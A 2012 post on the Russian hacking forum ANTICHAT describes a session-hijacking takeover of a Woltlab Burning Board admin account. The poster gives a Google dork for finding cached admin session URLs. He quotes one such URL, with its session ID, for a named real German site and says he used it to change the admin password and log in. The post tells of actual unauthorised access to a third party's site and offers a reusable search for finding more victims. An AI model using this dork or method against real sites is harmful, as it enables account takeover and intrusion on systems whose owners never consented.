HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Woltlab Burning Board - сброс админского пароля
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.02.2012, 12:34
Pirotexnik
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
С нами: 8200406

Репутация: 38
По умолчанию
Небольшая уязвимость найденная мной случайно.

Суть примерно такая:

Сессия админа кэшируется гуглом, и по дорку

Цитата:
Сообщение от None  
allinurl:"users.php?action=edit" inurl:"userid"
Я нашел ссылку

Цитата:
Сообщение от None  
http://www.die-melmacs.de/acp/users.php?action=edit&userid=1&sid=bc2a628e25a19d4 8e729f5fddfb66e0f
Перешел на страницу редактирования профиля, в течение 10 секунд сменил пароль.

Цитата:
Сообщение от None  
http://www.die-melmacs.de/acp/index.php
Тут ввел логин и свой пароль.

Я внутри

P.S. Незнаю боян, не боян. Наткнулся случайно. Если кто-то поможет проанализировать - буду признателен.
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.